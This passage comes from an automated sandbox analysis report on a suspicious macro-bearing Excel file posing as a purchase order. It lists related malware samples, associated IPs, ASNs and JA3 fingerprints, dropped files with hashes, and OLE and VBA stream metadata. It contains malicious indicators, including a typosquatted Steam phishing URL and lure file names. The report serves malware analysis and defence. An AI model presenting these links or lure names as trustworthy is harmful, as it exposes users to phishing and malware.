                                    FNLJD8Q3.exeGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    MTE PO - 0515-000112.xlsGet hashmaliciousUnknownBrowse
                                    • 199.232.210.172
                                    s-part-0044.t-0009.fb-t-msedge.netS5dpmRJg30.lnkGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    New order 242.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    zsd5jgZ9LU.exeGet hashmaliciousDanaBotBrowse
                                    • 13.107.253.72
                                    ImageG.exeGet hashmaliciousNovaSentinelBrowse
                                    • 13.107.253.72
                                    MSBuild.exeGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    NEW_TENDER_LIST.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    SecuriteInfo.com.Other.Malware-gen.17831.10614.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    https://staemcommunuttly.com/gift/activation=Dor5Fhnm1wGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    ATT50896.svgGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.253.72

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AS-COLOCROSSINGUSNew order 242.xlsGet hashmaliciousUnknownBrowse
                                    • 192.3.101.146
                                    PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 198.12.89.24
                                    QUOTATION#0065864.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                    • 198.46.177.153
                                    New order 242.xlsGet hashmaliciousUnknownBrowse
                                    • 192.3.101.146
                                    clearpicturewithmebestthingsforgivenmebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                    • 172.245.123.24
                                    needagoodplanforsuccesstogetbackbest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                    • 23.95.235.28
                                    needagoodplanforsuccesstogetbackbest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                    • 23.95.235.28
                                    niceworkingskillgivenmebest.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                    • 198.12.89.24
                                    TIMEWEB-ASRUPO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    pered.exeGet hashmaliciousUnknownBrowse
                                    • 2.59.41.142
                                    DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    DHL 733988905ZHH.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    _________03M4138.docx.bin.docGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    niga.jarGet hashmaliciousUnknownBrowse
                                    • 2.59.41.142
                                    MICROSOFT-CORP-MSN-AS-BLOCKUSNew order 242.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.67
                                    PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.60
                                    S5dpmRJg30.lnkGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    New order 242.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.246.60
                                    hgfs.ppc.elfGet hashmaliciousUnknownBrowse
                                    • 13.99.168.12
                                    hgfs.arm5.elfGet hashmaliciousUnknownBrowse
                                    • 52.101.21.152
                                    hgfs.mpsl.elfGet hashmaliciousUnknownBrowse
                                    • 13.76.184.174
                                    hgfs.arm.elfGet hashmaliciousUnknownBrowse
                                    • 52.173.237.73

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    6271f898ce5be7dd52b0fc260d0662b3PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    New order 242.xlsGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    windows-7-ultimate-x64-sp1.iso.exeGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    Andrej Simulator X.exeGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    test2.exe.bin.exeGet hashmaliciousXWormBrowse
                                    • 188.225.72.170
                                    FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                                    • 188.225.72.170
                                    FleshPowerV2.exeGet hashmaliciousBabadedaBrowse
                                    • 188.225.72.170
                                    Busy2.0.exeGet hashmaliciousBabadedaBrowse
                                    • 188.225.72.170
                                    MSBuild.exeGet hashmaliciousUnknownBrowse
                                    • 188.225.72.170
                                    a0e9f5d64349fb13191bc781f81f42e1PO#4500550389.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    S5dpmRJg30.lnkGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    New order 242.xlsGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    SecuriteInfo.com.Win64.MalwareX-gen.7894.13424.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.253.72
                                    SecuriteInfo.com.Trojan.PWS.Lumma.1819.24534.32219.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.253.72
                                    stk.dllGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    12Kp1xbcjv.exeGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72
                                    SystemProcess18.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                    • 13.107.253.72
                                    Setup.exeGet hashmaliciousUnknownBrowse
                                    • 13.107.253.72

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):118
                                    Entropy (8bit):3.5700810731231707
                                    Encrypted:false
                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                    MD5:573220372DA4ED487441611079B623CD
                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                    C:\Users\user\AppData\Local\Temp\E541A30.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):820
                                    Entropy (8bit):2.7159862044217853
                                    Encrypted:false
                                    SSDEEP:24:YIrNyk+vpKAzH5wcfHGFAAJp9WtAZRJ5poIHWI:Ymt+RfzHuc8AAJtfJ52IHV
                                    MD5:4C216BA54D1A1E057DBD017884BCAE68
                                    SHA1:04F6A2A122C952A6EE4E54FDB8185D4052074B21
                                    SHA-256:80AB97552897B6DD6B37DC244018756D8FE893435AA360A26BFF8E6560D81E9C
                                    SHA-512:1F5F905260B372F9AEE7B6E574F0F427A85F74F30AB90B2CBF7847462A437C8907BDCA33D54260F685AEC64CC53E3241E37A8D6999AB01138C08DB2B39FF7371
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.1.1.1.1.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.

                                    C:\Users\user\AppData\Local\Temp\~DFDC9BFF881A0942BF.TMP

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\Desktop\~$PO#4500550389.xla.xlsx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):165
                                    Entropy (8bit):1.3520167401771568
                                    Encrypted:false
                                    SSDEEP:3:qs/FFyGff:qsyWf
                                    MD5:5C22367453CA7CD5BD7CA96C4FD55742
                                    SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                                    SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
                                    SHA-512:BE2C202040245F25CB24C7F7B44A69F0000A95984236C3AE671443C56A7E1AE05BD7ACED71979ADF1159490770A767D25F581E76540C9C653441558BAECC0C89
                                    Malicious:true
                                    Preview:.user ..t.i.n.a. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                    Static File Info

                                    General

                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 17 02:57:46 2025, Security: 1
                                    Entropy (8bit):7.832961984010229
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 47.99%
                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                    File name:PO#4500550389.xla.xlsx
                                    File size:1'172'480 bytes
                                    MD5:f871e42b797cf70e3ee4a79e21f02197
                                    SHA1:b03ebab29eab8c27f1a814494953147a9b90322f
                                    SHA256:ecc360802ade998b33380472d1b5ce4dc95e4039daf93123ba3885e2716dc012
                                    SHA512:f641e3a231b6b0896fc35749ddcac371e5d5b46c07b0256eb8bf77d73e63eb149816d274c6b17c263481fbc54993e2b52d029f9fc7ca3f84ccc54043d14b3c76
                                    SSDEEP:24576:BLA6DHtWjejsk4McupJIwgxIOXR8YhbBWvdp8tLUWBMDcaPFKM:+SaejH4MTpzguM8YkpwLUwhM
                                    TLSH:01450294EFC05A26CA0D02350FE38B5C5A15EEEA5745620F3235BE1D3EB6B3E0B72519
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:35e58a8c0c8a85b9

                                    Static OLE Info

                                    General

                                    Document Type:OLE
                                    Number of OLE Files:1

                                    OLE File "PO#4500550389.xla.xlsx"

                                    Indicators
                                    Has Summary Info:
                                    Application Name:Microsoft Excel
                                    Encrypted Document:True
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:False
                                    Flash Objects Count:0
                                    Contains VBA Macros:True
                                    Summary
                                    Code Page:1252
                                    Author:
                                    Last Saved By:
                                    Create Time:2006-09-16 00:00:00
                                    Last Saved Time:2025-03-17 02:57:46
                                    Creating Application:Microsoft Excel
                                    Security:1
                                    Document Summary
                                    Document Code Page:1252
                                    Thumbnail Scaling Desired:False
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:786432
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                    VBA File Name:Sheet1.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 10 08 97 a3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                    VBA File Name:Sheet2.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 10 08 25 5f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                    VBA File Name:Sheet3.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` % . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 10 08 60 25 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                    VBA File Name:ThisWorkbook.cls
                                    Stream Size:985
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 10 08 32 10 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    General
                                    Stream Path:\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.25248375192737
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:244
                                    Entropy:2.889430592781307
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                    General
                                    Stream Path:\x5SummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:200
                                    Entropy:3.2503503175049815
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . # \\ . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                    General
                                    Stream Path:MBD00C9763A/\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.25248375192737
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD00C9763A/\x5DocumentSummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:296
                                    Entropy:3.2973193143624515
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 1 ! P r i n t _ A r e a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 b7 00 00 00 02 00 00 00 e4 04 00 00
                                    General
                                    Stream Path:MBD00C9763A/\x5SummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:31156
                                    Entropy:3.1876994904322484
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . y . . . . . . . . . . P . . . . . . . X . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . K e n n y C h e u n g . . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . m . . . @ . . . . _ ~ . \\ S . @ . . . . . . . . . . . . G . . . x . . . . . . . . 0 . . . . . . . . . . T < . . . . . . . . . . . . . . & .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 79 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 70 00 00 00 12 00 00 00 80 00 00 00 0b 00 00 00 98 00 00 00 0c 00 00 00 a4 00 00 00 0d 00 00 00 b0 00 00 00 13 00 00 00 bc 00 00 00 11 00 00 00 c4 00 00 00
                                    General
                                    Stream Path:MBD00C9763A/MBD00320C7F/\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.219515110876372
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD00C9763A/MBD00320C7F/Package
                                    CLSID:
                                    File Type:Microsoft Excel 2007+
                                    Stream Size:613686
                                    Entropy:7.989056691241232
                                    Base64 Encoded:True
                                    Data ASCII:P K . . . . . . . . . . ! . . X . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 1a 58 13 82 c0 01 00 00 90 07 00 00 13 00 bb 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 b7 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD00C9763A/MBD00321A49/\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.219515110876372
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
